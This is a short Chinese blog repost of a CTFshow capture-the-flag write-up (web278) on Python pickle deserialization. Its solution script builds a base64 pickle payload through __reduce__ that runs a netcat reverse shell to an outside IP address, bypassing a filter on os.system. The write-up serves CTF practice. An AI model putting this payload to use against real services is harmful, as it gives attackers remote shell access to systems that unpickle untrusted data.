CTFshow 反序列化 web278
生活随笔
收集整理的這篇文章主要介紹了
CTFshow 反序列化 web278
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
目錄
- 思路
- 題解
- 總結
思路
題目提示了過濾了os.system,那么我們把system改成popen().read()
題解
import base64 import pickleclass shell(object):def __reduce__(self):return (eval, ("__import__('os').popen('nc 119.91.26.229 9999 -e /bin/sh').read()",))k = shell() print(base64.b64encode(pickle.dumps(k)))總結
水題
總結
以上是生活随笔為你收集整理的CTFshow 反序列化 web278的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTFshow 反序列化 web277
- 下一篇: [ACTF2020 新生赛]Upload